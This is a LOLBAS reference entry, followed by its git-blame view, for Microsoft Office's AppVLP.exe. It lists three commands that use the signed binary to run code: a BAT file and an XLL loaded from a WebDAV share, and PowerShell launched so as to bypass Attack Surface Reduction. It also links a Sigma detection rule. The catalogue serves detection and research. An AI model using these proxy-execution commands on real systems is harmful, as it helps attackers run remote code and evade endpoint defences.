LOLBAS/yml/OtherMSBinaries/Appvlp.yml

---
Name: Appvlp.exe
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
  - Command: AppVLP.exe \\webdav\calc.bat
    Usecase: Execution of BAT file hosted on Webdav server.
    Description: Executes calc.bat through AppVLP.exe
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 w/Office 2016
  - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
    Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
    Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 w/Office 2016
  - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
    Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
    Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 w/Office 2016
Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
  - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
Resources:
  - Link: https://github.com/MoooKitty/Code-Execution
  - Link: https://twitter.com/moo_hax/status/892388990686347264
  - Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
  - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
Acknowledgement:
  - Person: fab
    Handle: '@0rbz_'
  - Person: Will
    Handle: '@moo_hax'
  - Person: Matt Wilson
    Handle: '@enigma0x3'
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`---`
			`Name: Appvlp.exe`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Description: Application Virtualization Utility Included with Microsoft Office 2016`
MITRE ATT&CK realignment sprint 2021-11-05 19:58:26 +01:00			`Author: 'Oddvar Moe'`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Created: 2018-05-25`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Commands:`
			`- Command: AppVLP.exe \\webdav\calc.bat`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Usecase: Execution of BAT file hosted on Webdav server.`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Description: Executes calc.bat through AppVLP.exe`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`Category: Execute`
Testing new template display 2018-09-19 04:35:46 +02:00			`Privileges: User`
			`MitreID: T1218`
			`OperatingSystem: Windows 10 w/Office 2016`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`Category: Execute`
Testing new template display 2018-09-19 04:35:46 +02:00			`Privileges: User`
			`MitreID: T1218`
			`OperatingSystem: Windows 10 w/Office 2016`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`Category: Execute`
Testing new template display 2018-09-19 04:35:46 +02:00			`Privileges: User`
			`MitreID: T1218`
			`OperatingSystem: Windows 10 w/Office 2016`
Major changes to Web portal - Small fixes to source files to adjust 2018-12-10 14:28:12 +01:00			`Full_Path:`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe`
			`Detection:`
$frack113$ Update old sigma link (#303) * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> --------- Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> 2023-10-18 17:30:34 +02:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Resources:`
Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files 2018-09-26 11:41:58 +02:00			`- Link: https://github.com/MoooKitty/Code-Execution`
			`- Link: https://twitter.com/moo_hax/status/892388990686347264`
			`- Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/`
			`- Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/`
Testing new template display 2018-09-19 04:35:46 +02:00			`Acknowledgement:`
			`- Person: fab`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Handle: '@0rbz_'`
Testing new template display 2018-09-19 04:35:46 +02:00			`- Person: Will`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Handle: '@moo_hax'`
Testing new template display 2018-09-19 04:35:46 +02:00			`- Person: Matt Wilson`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Handle: '@enigma0x3'`